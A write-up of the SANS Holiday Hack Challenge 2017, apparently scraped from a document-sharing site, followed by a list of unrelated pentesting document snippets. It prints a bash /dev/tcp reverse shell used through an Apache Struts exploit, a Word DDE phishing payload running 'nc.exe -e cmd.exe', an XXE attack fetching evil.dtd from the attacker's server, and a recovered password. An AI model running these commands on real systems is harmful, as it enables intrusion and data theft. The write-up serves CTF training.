HHC 2017 writeup, by RedTeam611
|
|
- Adam Evans
- 5 years ago
- Views:
Transcription
1 HHC 2017 writeup, by RedTeam611 After you complete the terminal challenges in the snowball games you will then move onto the web server challenges. Our first task to is to investigate the Letters to Santa application at What is the topic of The Great Book page available in the web root of the server? What is Alabaster Snowball's password? This website is public internet facing. When visiting this site you notice it might by SQL injectable or have other types of exploits. But taking a quick look at the source shows us a URL leading to the Dev server located at
2 When browsing to the Dev server [ we can see they have a Toy ordering system. According to the hints this site is exploitable to Appache struts CVE The Sans hints link us to a Blog showing how to edit a Apache Struts python exploit. We will use this Python exploit and tweak some stuff/commands
3 Note: We will need to fire up up a VPS with the python script installed on it.vps s are easier to work with as they have public IP addresses and if you are trying to catch a reverse shell they are easier to catch then setting up port forwarding on your router at home, assuming you have access to your router. If we use the syntax for the python script you will see the payload executed [whoami] but does not return any information. How do we know the command [whoami] is being executed on the server? One way to test this would be to make a test file on the webs server folder that we can then browse to in our Firefox and download the test file. I didn t go this route and tested with a reverse shell. We will need 2 windows open for our reverse shell. One to send the python script and one to catch the shell, if successful. I usually use Pentest monkey s cheat sheet for reverse shells We will be using the python command python cve py -u -c "bash -i >& /dev/tcp/ /1337 0>&1" Our VPS is using the IP and we will be using port 1337 ;) The command [bash -i >& /dev/tcp/ /1337 0>&1] sends a Reverse shell to our VPS and as you can see by the screen shot, the command is executed successful and we are now in the system/dev server.
4 Our next step once in the Dev server is to find Alabaster_Snowballs password. We can see by our Elf hints that sometimes developers hard code credentials into their development files. In this cause Alabaster most likely did this. If we Google what folder does developers keep files stored in, we lead to the /opt directory. We will be using a recursive Grep looking for the user name alabaster. [grep -nr 'alabaster*'.] We can now see the string username [alabaster_snowball] was found in a.class file and if we open with file we can see his password. We have found his password of [ stream_unhappy_buy_loss ] 2)Next we will move on to the SMB server. The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. Using your access to the Letters to Santa server, identify and enumerate the SMB file-sharing server. What is the file server share name?
5 First thing we need to do is a Nmap scan of the network to get a idea of whats around internally. We will start with [nmap ] This will scan the subnet starting from.1 to.255 alabaster_snowball@l2s:/$ nmap nmap Starting Nmap 7.40 ( ) at :26 UTC Nmap scan report for hhc17-l2s-proxy.c.holidayhack2017.internal ( ) Host is up ( s latency). Not shown: 996 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https 2222/tcp open EtherNetIP-1 Nmap scan report for hhc17-apache-struts1.c.holidayhack2017.internal ( ) Host is up ( s latency). Not shown: 998 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap scan report for mail.northpolechristmastown.com ( ) Host is up ( s latency). Not shown: 994 closed ports PORT STATE SERVICE 22/tcp open ssh 25/tcp open smtp 80/tcp open http 143/tcp open imap 2525/tcp open ms-v-worlds 3000/tcp open ppp Nmap scan report for edb.northpolechristmastown.com ( ) Host is up ( s latency). Not shown: 996 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 389/tcp filtered ldap 8080/tcp open http-proxy Nmap scan report for hhc17-emi.c.holidayhack2017.internal ( ) Host is up ( s latency). Not shown: 995 closed ports PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds
6 3389/tcp open ms-wbt-server Nmap scan report for hhc17-apache-struts2.c.holidayhack2017.internal ( ) Host is up ( s latency). Not shown: 996 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 5678/tcp open rrac 8082/tcp open blackice-alerts Nmap scan report for eaas.northpolechristmastown.com ( ) Host is up (0.0012s latency). Not shown: 998 filtered ports PORT STATE SERVICE 80/tcp open http 3389/tcp open ms-wbt-server Nmap done: 255 IP addresses (7 hosts up) scanned in 8.56 seconds As we can see from Nmap output, the IP has port 445 open indicating it has smb open. But if we try to access this smb server with Alabaster s user name and password we will be unsuccessful/denied. This server is meant to throw you off. If we tweak our Nmap scan, the Elf hint tell s us there is hidden smb server. We must change our Nmap command to find it. Using the command [nmap -PS ] we can see there is another smb server, this definitely shows us it is the right server, its named SMB SEVER! DERP!
7 hhc17-smb-server.c.holidayhack2017.internal ( ) In order to access this server we will have to use some port forwarding. If we ping the Dev server URL at dev.northpolechristmastown.com it will return the Public IP address for the server which is We can login into the Dev server with port forwarding that then sends us to the SMB server using Alabster s password stream_unhappy_buy_loss. [ ssh -L :445: :445 alabaster_snowball@ ] Once connected we will use smbclient command to find the share available. The -L will list of shares of the username Alabaster_Snowball [ smbclient -L U alabaster_snowball ] We can see the Filestor is the sharename we most likely need to investigate. We will login the smb server with password reuse and can then see our next GreatBookPage 3 flag.
8 3) Elf Web Access (EWA) is the preferred mailer for North Pole elves, available internally at What can you learn from The Great Book page found in an on that server? Our next step is to access the Elf server. As we can see from our Nmap scan of IP ports 80 and 3000 are open. They are associated with a webserver. If you ssh forward to port 80 you will get a default Apache Ubuntu page, which tells you, your using the wrong port. We need to forward to port 3000 not 80. Nmap scan report for mail.northpolechristmastown.com ( ) Host is up ( s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) 25/tcp open smtp Postfix smtpd 80/tcp open http nginx (Ubuntu) 143/tcp open imap Dovecot imapd 2525/tcp open smtp Postfix smtpd 3000/tcp open http Node.js Express framework Service Info: Host: mail.northpolechristmastown.com; OS: Linux; CPE: cpe:/o:linux:linux_kernel We will tunnel use the follow command to ssh tunnel. It s basically saying to forward us to port 3000 from our localhost port 8080 through our ssh tunnel. ssh -L 8080:mail.northpolechristmastown.com:3000 alabaster_snowball@ As you can see if now have access to the EWA, which is a knock off of Microsoft OWA. After getting the to EWA login there is a challenge to build the cookie to login. I had someone help me with this and or give me the answer as I was not smart enough to figure it out. So basically our cookie needs to look like this. The cookie to build is located at localhost:8080/cookie.txt
9 We download the cookie manager plug-in for Firefox and add the following cookie to the content area. AAAAAAAAAAAAAAAAA"} After we do this we save it and F5 refresh to login as Alabaster. Like any other complex SCADA systems, the North Pole uses Elf-Machine Interfaces (EMI) to monitor and control critical infrastructure assets. These systems serve many uses, including access and web browsing. Gain access to the EMI server through the use of a phishing attack with your access to the EWA server. Retrieve The Great Book page from C:\GreatBookPage7.pdf. What does The Great Book page describe? When going through Alabaster s we can see that he wants a gingerbread cookie recipe in a docx file. If we send him this file to his emal he will open it and we will phish him with a DDE exploit.
10 In the screen shot above Alabaster hints that he has Netcat installed on his system. We will use this for the DDE attack. As I am typing this report on Kali I will not have the screenshot for MS word. The sytnax for the DDE we will use will be DDEAUTO c:\\windows\\system32\\cmd.exe "/k nc.exe e cmd.exe" Since Alabaster has netcat on his system this command will execute netcat to connect to our VPS and return the command prompt.
11
12 Once in the EMI server we can grab our flag for the GreatbookPage 7 The GreatBookage 7 is the last book to get. Tracking back to GreatBookPage 6 now we go to our last challenge we needed to complete. The North Pole engineering team has introduced an Elf as a Service (EaaS) platform to optimize resource allocation for mission-critical Christmas engineering projects at Visit the system and retrieve instructions for accessing The Great Book page from C:\greatbook.txt. Then retrieve The Great Book PDF file by following those directions. What is the title of The Great Book page? We will get to the EaaS service with port forwarding once again with ssh -L 8080:eaas.northpolechristmastown.com:80 alabaster_snowball@ pw=stream_unhappy_buy_loss This is located internally at eaas.northpolechristmastown.com or the IP.
13
14 The EAAS site uses XML data to manage requests from other teams. There is a sample request layout available that you can download. Teams just customize the XML and submit. XML processing can be complex. Sans has a blog about how to to exploit XML attacks. On this site we will edit some of the sample XML code they use and use it on the EasS server. The challenge states to get the GreatBookPage 6 information from the c:\greatbook.txt path. We will use this path in our XML exploit.
15 1. We upload our edited XML payload which points the system to load a DTD file from our remote web server/vps. 2. The XML parser reaches out to the designated VPS/Web Server to retrieve DTD contents. 3. XML parser loads the contents of the DTD into the pre-processing of the original XML payload and returns us the results of c:\greatbook.txt
16 As we can see from the screenshot, to the right the EaaS server downloads the evil.dtd from our VPS webserver on port 8080 and on the left it returns the results from the c:\greatbook.txt file on port We then get the path to the GreatBookPage6 We have successfully captured all the GreatBook flags for the HHC! Tips and tricks 1)Use certutil to get Sha1hash from file names in Windows CMD Example: Example: [ C:\>certutil -hashfile GreatBookPage7.pdf SHA1 ] 2)Use Sha1sum to get Sha1 hash of GreatBook to upload to achievements Example: [ Sha1sum GreatBook.pdf ] 3)Use netcat to transfer files with windows Example: [ nc.exe -w < GreatBookPage7.pdf ] --Send Example: [ nc -l -p 1338 > GreatBookPage7.pdf ] Receive
3. Apache Server Vulnerability Identification and Analysis
1. Target Identification The pentester uses netdiscover to identify the target: root@kali:~# netdiscover -r 192.168.0.0/24 Target: 192.168.0.48 (Cadmus Computer Systems) Note: the victim IP address changes
More informationPenetration Testing with Kali Linux
Penetration Testing with Kali Linux PWK Copyright Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security No part of this publication, in whole or in part, may
More informationCyberP3i Hands-on Lab Series
CyberP3i Hands-on Lab Series Lab Series using NETLAB Designer: Dr. Lixin Wang, Associate Professor Hands-On Lab for Application Attacks The NDG Security+ Pod Topology Is Used 1. Introduction In this lab,
More informationMcAfee Certified Assessment Specialist Network
McAfee MA0-150 McAfee Certified Assessment Specialist Network Version: 4.0 Topic 1, Volume A QUESTION NO: 1 An attacker has compromised a Linux/Unix host and discovers a suspicious file called "password"
More informationCS 410/510: Web Security X1: Labs Setup WFP1, WFP2, and Kali VMs on Google Cloud
CS 410/510: Web Security X1: Labs Setup WFP1, WFP2, and Kali VMs on Google Cloud Go to Google Cloud Console => Compute Engine => VM instances => Create Instance For the Boot Disk, click "Change", then
More informationModule 1: Penetration Testing Planning and Scoping. Module 2: Basic Usage of Linux and its services
Following topics will be covered: Module 1: Penetration Testing Planning and Scoping - Types of penetration testing and ethical hacking projects - Penetration testing methodology - Limitations and benefits
More informationI started off with a quick nmap scan, which showed both port 80 and 443 open.
Mr-Robot: 1 Walkthrough Author: mrb3n Download location: https://download.vulnhub.com/mrrobot/mrrobot.ova Goal: Find 3 keys hidden in different locations -----------------------------------------------------------------------------------------------------------------
More informationAbusing Bash on Windows
Abusing Bash on Windows Antoine Cervoise [AbusingBashForWindows]-[External]-[Final]- v[1.0] Who am I? Antoine Cervoise - @acervoise Pentester @NTT Security FR I like Arduinos, passwords, phishing emails,
More informationEvaluating Website Security with Penetration Testing Methodology
Evaluating Website Security with Penetration Testing Methodology D. Menoski, P. Mitrevski and T. Dimovski St. Clement of Ohrid University in Bitola/Faculty of Technical Sciences, Bitola, Republic of Macedonia
More information5/15/2009. Introduction
Part 1: Cyber-Graffiti You know, I don t know what I hate more, wearing your face, or wearing your body. Look, why don t we just give them back to each other and call it even, okay? Castor Troy (Nicolas
More informationCertified Vulnerability Assessor
Certified Vulnerability Assessor COURSE BENEFITS Course Title:Certified Vulnerability Assessor Duration: 3Day Language: English Class Format Options: Instructor-led classroom Live Online Training Prerequisites:
More informationJoomla 3.X Global Settings Part III Server Settings
Joomla 3.X Global Settings Part III Server Settings Diagram 1 Path to Temp Folder: This is a text box adjacent to this prompt which holds the path to Joomla s temp folder on the web server. This is the
More informationProject 4: Penetration Test
Project description Project 4: Penetration Test April 28, 2014 Bing Hao The learning objective of this project is to gain hands on experiences with the usage and functionality of Nmap, Neussus and Metsploit.
More informationSECURITY+ LAB SERIES. Lab 3: Protocols and Default Network Ports Connecting to a Remote System
SECURITY+ LAB SERIES Lab 3: Protocols and Default Network Ports Connecting to a Remote System Document Version: 2015-09-24 otherwise noted, is licensed under the Creative Commons Attribution 3.0 Unported
More informationHacking Our Way to Better Security: Lessons from a Web Application Penetration Test. Tyler Rasmussen Mercer Engineer Research Center
Hacking Our Way to Better Security: Lessons from a Web Application Penetration Test Tyler Rasmussen Mercer Engineer Research Center About Me Cybersecurity Engineering Intern @ MERC Senior IT/Cybersecurity
More informationCNIT 129S: Securing Web Applications. Ch 10: Attacking Back-End Components
CNIT 129S: Securing Web Applications Ch 10: Attacking Back-End Components Injecting OS Commands Web server platforms often have APIs To access the filesystem, interface with other processes, and for network
More informationThe Wonderful World of Services. By: Stefanja
The Wonderful World of Services By: Stefanja What Is a Service? Make the computer world go round Without Services we d have nothing A service is an application that runs in the background to enable a computer
More informationNetcat Scanning to Backdoors
Netcat Scanning to Backdoors Security & Privacy on the Internet (03-60-467) Fall 2009 Submitted to Dr. A.K. Aggarwal Submitted By Jeffrey Kurcz School of Computer Science University of Windsor CONTENTS
More informationApplying for Jobs Online
Applying for Jobs Online Hi, I m Sarah. I m here to show you how to apply for a job using an online application form. Most jobs now require you to fill out an application on the Internet. In this course
More informationStarting Nmap 6.40 ( ) at :54 Pacific Daylight Time Nmap scan report for mass_dns: warning: Unable to
Starting Nmap 6.40 ( http://nmap.org ) at 2016-06-12 12:54 Pacific Daylight Time Nmap scan report for 172.30.0.7 mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using
More informationECCouncil Exam v9 Certified Ethical Hacker Exam V9 Version: 7.0 [ Total Questions: 125 ]
s@lm@n ECCouncil Exam 312-50v9 Certified Ethical Hacker Exam V9 Version: 7.0 [ Total Questions: 125 ] Question No : 1 An Intrusion Detection System(IDS) has alerted the network administrator to a possibly
More informationCombating Common Web App Authentication Threats
Security PS Combating Common Web App Authentication Threats Bruce K. Marshall, CISSP, NSA-IAM Senior Security Consultant bmarshall@securityps.com Key Topics Key Presentation Topics Understanding Web App
More informationResponder for Purple Teams
Responder for Purple Teams Responder for Purple Teams whoami Why this talk? Responder Overview Related Tools WPAD Attack Analyse Mode Defense whoami Full-Spectrum Cyber Person Nearly 20 years of this stuff
More informationWEBSHELL TO PHISHING UDURRANI
WEBSHELL TO PHISHING UDURRANI SUMMARY: Attacker uploads the master webshell Attacker sets a password [ sha1(md5(password)) ] Attacker is able to load multiple modules including: { explorer", "terminal",
More informationLecture 7: Web hacking 3, SQL injection, Xpath injection, Server side template injection, File inclusion
IN5290 Ethical Hacking Lecture 7: Web hacking 3, SQL injection, Xpath injection, Server side template injection, File inclusion Universitetet i Oslo Laszlo Erdödi Lecture Overview What is SQL injection
More informationJacksonville Linux User Group Presenter: Travis Phillips Date: 02/20/2013
Jacksonville Linux User Group Presenter: Travis Phillips Date: 02/20/2013 Welcome Back! A Quick Recap of the Last Presentation: Overview of web technologies. What it is. How it works. Why it s attractive
More informationSANS Holiday Hack 2017 By Delaney Ng, Janusz Jasinski and Paul Beckett
SANS Holiday Hack 2017 By Delaney Ng, Janusz Jasinski and Paul Beckett A few words Delaney Year upon year, SANS and CounterHack have outdone themselves. Many thanks to the team for putting in countless
More informationA framework to 0wn the Web - part I -
A framework to 0wn the Web - part I - Andrés Riancho andres@bonsai-sec.com SecTor Toronto, Canada - 2009 Copyright 2008 CYBSEC. All rights reserved. andres@bonsai-sec:~$ whoami Web Application Security
More informationWeb server reconnaissance
Web server reconnaissance Reconnaissance and fingerprinting Finding information about a target web server/web site May be illegal to perform reconnaissance on a web server and web site without prior approval/permission.
More informationWatchGuard AP - Remote Code Execution
WatchGuard AP - Remote Code Execution Security Advisory Date 1/05/2018 Version: 1.0 Table of Contents 1. Document Control... 2 1.1. Document Information... 2 1.2. Revision Control... 2 2. Background...
More informationAdvanced Service Design. vrealize Automation 6.2
vrealize Automation 6.2 You can find the most up-to-date technical documentation on the VMware website at: https://docs.vmware.com/ If you have comments about this documentation, submit your feedback to
More informationETHICAL HACKING LAB SERIES. Lab 13: Exploitation with IPv6
ETHICAL HACKING LAB SERIES Lab 13: Exploitation with IPv6 Certified Ethical Hacking Domains: System Hacking, Penetration Testing Document Version: 2015-08-14 otherwise noted, is licensed under the Creative
More informationSecurity Course. WebGoat Lab sessions
Security Course WebGoat Lab sessions WebGoat Lab sessions overview Initial Setup Tamper Data Web Goat Lab Session 4 Access Control, session information stealing Lab Session 2 HTTP Basics Sniffing Parameter
More informationCreate and Apply Clientless SSL VPN Policies for Accessing. Connection Profile Attributes for Clientless SSL VPN
Create and Apply Clientless SSL VPN Policies for Accessing Resources, page 1 Connection Profile Attributes for Clientless SSL VPN, page 1 Group Policy and User Attributes for Clientless SSL VPN, page 3
More informationCurso: Ethical Hacking and Countermeasures
Curso: Ethical Hacking and Countermeasures Module 1: Introduction to Ethical Hacking Who is a Hacker? Essential Terminologies Effects of Hacking Effects of Hacking on Business Elements of Information Security
More informationFtp Connecting Command Prompt To Sql Server 2008 Via
Ftp Connecting Command Prompt To Sql Server 2008 Via I have written a query to download files from a FTP server. print @cmd EXEC master.xp_cmdshell @cmd select @cmd = 'echo ' + 'prompt ' + hrs without
More informationBase64 The Security Killer
Base64 The Security Killer Kevin Fiscus NWN Corporation Session ID: DAS-203 Session Classification: Intermediate A Short (Made Up) Security Story Helix Pharmaceuticals is concerned about security Industrial
More informationCATEGORY WEB FANTASTIC TALES OF CAPTURE-THE-FLAG (CTF) CHALLENGES PAST OWASP TORONTO MAY 25, 2017
CATEGORY WEB FANTASTIC TALES OF CAPTURE-THE-FLAG (CTF) CHALLENGES PAST OWASP TORONTO MAY 25, 2017 whoami Jamie Baxter (@jmbxtr) Independent Information Security Consultant focusing on security assessments
More informationPrinciples of ICT Systems and Data Security
Principles of ICT Systems and Data Security Ethical Hacking Ethical Hacking What is ethical hacking? Ethical Hacking It is a process where a computer security expert, who specialises in penetration testing
More informationMetasploit. Installation Guide Release 4.4
Metasploit Installation Guide Release 4.4 TABLE OF CONTENTS About this Guide Target Audience...1 Organization...1 Document Conventions...1 Support...2 Support for Metasploit Pro and Metasploit Express...2
More informationCS 642 Homework #4. Due Date: 11:59 p.m. on Tuesday, May 1, Warning!
CS 642 Homework #4 Due Date: 11:59 p.m. on Tuesday, May 1, 2007 Warning! In this assignment, you will construct and launch attacks against a vulnerable computer on the CS network. The network administrators
More informationGetting started with OWASP WebGoat 4.0 and SOAPUI.
Getting started with OWASP WebGoat 4.0 and SOAPUI. Hacking web services, an introduction. Version 1.0 by Philippe Bogaerts mailto:philippe.bogaerts@radarhack.com http://www.radarhack.com 1. Introduction
More informationWEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang
WEB SECURITY WORKSHOP TEXSAW 2014 Presented by Solomon Boyd and Jiayang Wang Introduction and Background Targets Web Applications Web Pages Databases Goals Steal data Gain access to system Bypass authentication
More informationVII. Corente Services SSL Client
VII. Corente Services SSL Client Corente Release 9.1 Manual 9.1.1 Copyright 2014, Oracle and/or its affiliates. All rights reserved. Table of Contents Preface... 5 I. Introduction... 6 Chapter 1. Requirements...
More informationBraindumpsIT. BraindumpsIT - IT Certification Company provides Braindumps pdf!
BraindumpsIT http://www.braindumpsit.com BraindumpsIT - IT Certification Company provides Braindumps pdf! Exam : GPEN Title : GIAC Certified Penetration Tester Vendor : GIAC Version : DEMO Get Latest &
More informationExam4Free. Free valid exam questions and answers for certification exam prep
Exam4Free http://www.exam4free.com Free valid exam questions and answers for certification exam prep Exam : MA0-150 Title : McAfee Certified Assessment Specialist- UH Vendors : McAfee Version : DEMO Get
More informationWhy bother? Causes of data breaches OWASP. Top ten attacks. Now what? Do it yourself Questions?
Jeroen van Beek 1 Why bother? Causes of data breaches OWASP Top ten attacks Now what? Do it yourself Questions? 2 In many cases the web application stores: Credit card details Personal information Passwords
More informationDCLI User's Guide. Modified on 20 SEP 2018 Data Center Command-Line Interface
Modified on 20 SEP 2018 Data Center Command-Line Interface 2.10.0 You can find the most up-to-date technical documentation on the VMware website at: https://docs.vmware.com/ If you have comments about
More informationHX Data Platform Support
Using TAC Support for Troubleshooting, on page 1 Auto Support and Smart Call Home for HyperFlex, on page 2 Cisco Bundles, on page 7 Using TAC Support for Troubleshooting This section lists common TAC support-assisted
More informationManual Ftp Windows 7 Command Line Port Scan
Manual Ftp Windows 7 Command Line Port Scan This window allows for network logon Name and Password information for a the path to a 7- Mode NetApp filer for either real-time or scanning scenarios. Choose
More informationBitnami ProcessMaker Community Edition for Huawei Enterprise Cloud
Bitnami ProcessMaker Community Edition for Huawei Enterprise Cloud Description ProcessMaker is an easy-to-use, open source workflow automation and Business Process Management platform, designed so Business
More informationCoding for Penetration
Coding for Penetration Testers Building Better Tools Jason Andress Ryan Linn ELSEVIER AMSTERDAM BOSTON HEIDELBERG LONDON NEW YORK OXFORD PARIS SAN DIEGO SAN FRANCISCO SINGAPORE SYDNEY TOKYO Syngress is
More informationA Simple Course Management Website
A Simple Course Management Website A Senior Project Presented to The Faculty of the Computer Engineering Department California Polytechnic State University, San Luis Obispo In Partial Fulfillment Of the
More informationInjectable Exploits. New Tools for Pwning Web Apps and Browsers
Injectable Exploits New Tools for Pwning Web Apps and Browsers Kevin Johnson kevin@inguardians.com Justin Searle justin@inguardians.com Frank DiMaggio frank@secureideas.net 1 Who are we? Kevin Johnson
More informationPractical security scanning for busy network administrators. Jim Davis D7: Data Science Institute
Practical security scanning for busy network administrators Jim Davis D7: Data Science Institute jjdavis@email.arizona.edu Security scanning tries to find problems before bad actors do A network security
More informationPwn ing you(r) cyber offenders
Pwn ing you(r) cyber offenders Presented by: Piotr Duszynski @drk1wi ;WHOAMI;#? Senior Security Consultant @Trustwave (OSCE, OSCP, ) In security field for the past 6 years, hacking since 9 Enjoys security
More informationLab 5: Web Attacks using Burp Suite
Lab 5: Web Attacks using Burp Suite Aim The aim of this lab is to provide a foundation in performing security testing of web applications using Burp Suite and its various tools. Burp Suite and its tools
More informationWeb Application Firewall (WAF) Evasion Techniques
themiddle Follow Security Researcher Dec 7, 2017 9 min read A typical kit used by pentesters during a WAPT :) Web Application Firewall (WAF) Evasion Techniques I can read your passwd le with: /???/??t
More informationUsing RDP with Azure Linux Virtual Machines
Using RDP with Azure Linux Virtual Machines 1. Create a Linux Virtual Machine with Azure portal Create SSH key pair 1. Install Ubuntu Bash shell by downloading and running bash.exe file as administrator.
More informationBasic Linux Security. Roman Bohuk University of Virginia
Basic Linux Security Roman Bohuk University of Virginia What is Linux? An open source operating system Project started by Linus Torvalds kernel Kernel: core program that controls everything else (controls
More informationLab 2: Creating Secure Architectures
Lab 2: Creating Secure Architectures A Challenge Our challenge is to setup MyBank Incorp, where each of you will be allocated a network and hosts to configure and get on-line (Figure 1). For this you will
More informationSophos UTM Web Application Firewall For: Microsoft Exchange Services
How to configure: Sophos UTM Web Application Firewall For: Microsoft Exchange Services This guide explains how to configure your Sophos UTM 9.3+ to allow access to the relevant Microsoft Exchange services
More informationApplication Visibility and Analytics SE Remote Demo Platform Information
Application Visibility and Analytics SE Remote Demo Platform Information Table of Contents Introduction... 2 How to obtain access to the Demo?... 3 Demo Overview... 6 Network Diagram... 6 Demo Flow...
More informationSECURITY TESTING: WINDOWS OS
International Journal of Latest Research In Engineering and Computing (IJLREC) Volume 2, Issue 6, Page No. 1-11 www.ijlrec.com ISSN: 2347-6540 SECURITY TESTING: WINDOWS OS 1 Siddhanth Lathar, 2 Dr. Ashish
More informationNmap & Metasploit. Chun-Jen (James) Chung. Arizona State University
Nmap & Metasploit Chun-Jen (James) Chung Nmap recap Nmap uses raw IP packets in novel ways to determine what hosts are available on the network What services (application name and version) those hosts
More informationHow To Start Mysql Using Linux Command Line Client In Ubuntu
How To Start Mysql Using Linux Command Line Client In Ubuntu Step One: Install MySQL Client On Debian, Ubuntu or Linux Mint: Before you start typing commands at the MySQL prompt, remember that each In
More informationGAUTAM SINGH STUDY MATERIAL SOFTWARE QUALITY Unit 17. Metasploit
Unit 17. Metasploit Metasploit is one of the most powerful tools used for penetration testing. Most of its resources can be found at www.metasploit.com. It comes in two versions: commercial and free edition.
More informationPRACTICE-LABS User Guide
PRACTICE-LABS User Guide System requirements Microsoft Windows XP Sp2/Vista/7/8/2003/2008 Linux Redhat, Fedora, SuSE, Ubuntu Apple Mac OS X Minimum of 512Mb Ram (depending on OS) Minimum processor speed
More informationConfiguring GNS3 for CCNA Security Exam (for Windows) Software Requirements to Run GNS3
Configuring GNS3 for CCNA Security Exam (for Windows) Software Requirements to Run GNS3 From Cisco s website, here are the minimum requirements for CCP 2.7 and CCP 2.8: The following info comes from many
More informationApplication Security Introduction. Tara Gu IBM Product Security Incident Response Team
Application Security Introduction Tara Gu IBM Product Security Incident Response Team About Me - Tara Gu - tara.weiqing@gmail.com - Duke B.S.E Biomedical Engineering - Duke M.Eng Computer Engineering -
More informationExam Questions MA0-150
Exam Questions MA0-150 McAfee Certified Assessment Specialist- UH https://www.2passeasy.com/dumps/ma0-150/ 1.An attacker has compromised a Linux/Unix host and discovers a suspicious file called "password"
More informationAutomatic Creation of a Virtual Network with VBoxManage [1]
Automatic Creation of a Virtual Network with V... 1 Automatic Creation of a Virtual Network with VBoxManage [1] Submitted by Steve [2] on Wed, 18/09/2013-5:46pm I am using VirtualBox to create multiple
More informationInstallation Guide. Mobile Print for Business version 1.0. July 2014 Issue 1.0
Installation Guide Mobile Print for Business version 1.0 July 2014 Issue 1.0 Fuji Xerox Australia 101 Waterloo Road North Ryde NSW 2113 For technical queries please contact the Fuji Xerox Australia Customer
More informationRemote social engineering techniques involving Microsoft Universal Naming Convention (UNC) function.
10 March 2016 Remote social engineering techniques involving Microsoft Universal Naming Convention (UNC) function. Presented by Neil Lines Who am I? Neil Lines - Pen Tester Involved in a range of security
More informationPenetration testing a building automation system
Penetration testing a building automation system Is your smart office creating backdoors for hackers? IBM X-Force Research Click here to start There is much focus in the IT industry on securing web servers,
More informationYou can find the lab demo here:
Lab 8: Armitage Aim The aim of this lab is to introduce you to Armitage. Armitage developed by Raphael Mudge provides an open source Graphical User Interface (GUI) front end to Metasploit and supports
More informationWeb Application Security. Philippe Bogaerts
Web Application Security Philippe Bogaerts OWASP TOP 10 3 Aim of the OWASP Top 10 educate developers, designers, architects and organizations about the consequences of the most common web application security
More informationAgent and Agent Browser. Updated Friday, January 26, Autotask Corporation
Agent and Agent Browser Updated Friday, January 26, 2018 2018 Autotask Corporation Table of Contents Table of Contents 2 The AEM Agent and Agent Browser 3 AEM Agent 5 Privacy Mode 9 Agent Browser 11 Agent
More informationAttacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14
Attacks Against Websites 3 The OWASP Top 10 Tom Chothia Computer Security, Lecture 14 OWASP top 10. The Open Web Application Security Project Open public effort to improve web security: Many useful documents.
More informationConnect using Putty to a Linux Server
Connect using Putty to a Linux Server PuTTY is an open source SSH client for Windows, and allows you to securely connect to remote servers from your Windows machine. Configuration SSH Key Authentication
More informationDCLI User's Guide. Data Center Command-Line Interface
Data Center Command-Line Interface 2.10.2 You can find the most up-to-date technical documentation on the VMware website at: https://docs.vmware.com/ If you have comments about this documentation, submit
More informationDreamweaver is a full-featured Web application
Create a Dreamweaver Site Dreamweaver is a full-featured Web application development tool. Dreamweaver s features not only assist you with creating and editing Web pages, but also with managing and maintaining
More informationDreamweaver is a full-featured Web application
Create a Dreamweaver Site Dreamweaver is a full-featured Web application development tool. Dreamweaver s features not only assist you with creating and editing Web pages, but also with managing and maintaining
More informationHost Identity Sources
The following topics provide information on host identity sources: Overview: Host Data Collection, on page 1 Determining Which Host Operating Systems the System Can Detect, on page 2 Identifying Host Operating
More informationContents. Note: pay attention to where you are. Note: Plaintext version. Note: pay attention to where you are... 1 Note: Plaintext version...
Contents Note: pay attention to where you are........................................... 1 Note: Plaintext version................................................... 1 Hello World of the Bash shell 2 Accessing
More informationChange Management: DYNAMIC NETWORK MAPPING. LinuxWorld San Francisco Security Track. Presented by Joshua D. Abraham.
Change Management: DYNAMIC NETWORK MAPPING LinuxWorld San Francisco Security Track Presented by Joshua D. Abraham August 16th 2006 jabra@ccs.neu.edu Northeastern University Agenda How do we scan? What
More informationHackveda Training - Ethical Hacking, Networking & Security
Hackveda Training - Ethical Hacking, Networking & Security Day1: Hacking windows 7 / 8 system and security Part1 a.) Windows Login Password Bypass manually without CD / DVD b.) Windows Login Password Bypass
More informationSBCC Web File System - Xythos
Table of Contents Table of Contents...1 Purpose...1 Login Procedure...1 Creating and Sharing a Web Folder for MAT153...2 Dreamweaver Remote Info...4 I Forgot My Pipeline Credentials...6 Purpose This purpose
More informationIntegrity attacks (from data to code): Malicious File upload, code execution, SQL Injection
Pattern Recognition and Applications Lab Integrity attacks (from data to code): Malicious File upload, code execution, SQL Injection Igino Corona igino.corona _at_ diee.unica.it Computer Security May 2nd,
More informationH1-212 Capture the Flag Solution Author: Corben Douglas
H1-212 Capture the Flag Solution Author: Corben Douglas (@sxcurity) Description: An engineer of acme.org launched a new server for a new admin panel at http://104.236.20.43/. He is completely confident
More informationDCLI User's Guide. Data Center Command-Line Interface 2.9.1
Data Center Command-Line Interface 2.9.1 You can find the most up-to-date technical documentation on the VMware website at: https://docs.vmware.com/ If you have comments about this documentation, submit
More informationFtp Command Line Manual Windows Username Password Linux
Ftp Command Line Manual Windows Username Password Linux Midnight Commander is a console based full-screen text mode File Manager that allows you to copy, MC has many features which are useful for a user
More informationOracle Application Express: Administration 1-2
Oracle Application Express: Administration 1-2 The suggested course agenda is displayed in the slide. Each lesson, except the Course Overview, will be followed by practice time. Oracle Application Express:
More informationConfiguring RentalPoint Web Services
Table of Contents 1. What is RentalPoint Web Services? 2 2. How to Configure Your Server 2 2.1 Download and Install.NET Framework 4.5.1 2 2.2 Download and Install IIS 2 2.3 Download and Install RPWS Files
More informationQuestion No: 2 Which identifier is used to describe the application or process that submitted a log message?
Volume: 65 Questions Question No: 1 Which definition of a fork in Linux is true? A. daemon to execute scheduled commands B. parent directory name of a file pathname C. macros for manipulating CPU sets
More informationSQL Injection Attack Lab
SEED Labs SQL Injection Attack Lab 1 SQL Injection Attack Lab Copyright 2006-2016 Wenliang Du, Syracuse University. The development of this document was partially funded by the National Science Foundation
More informationPhishing Stories. Shaun Jones
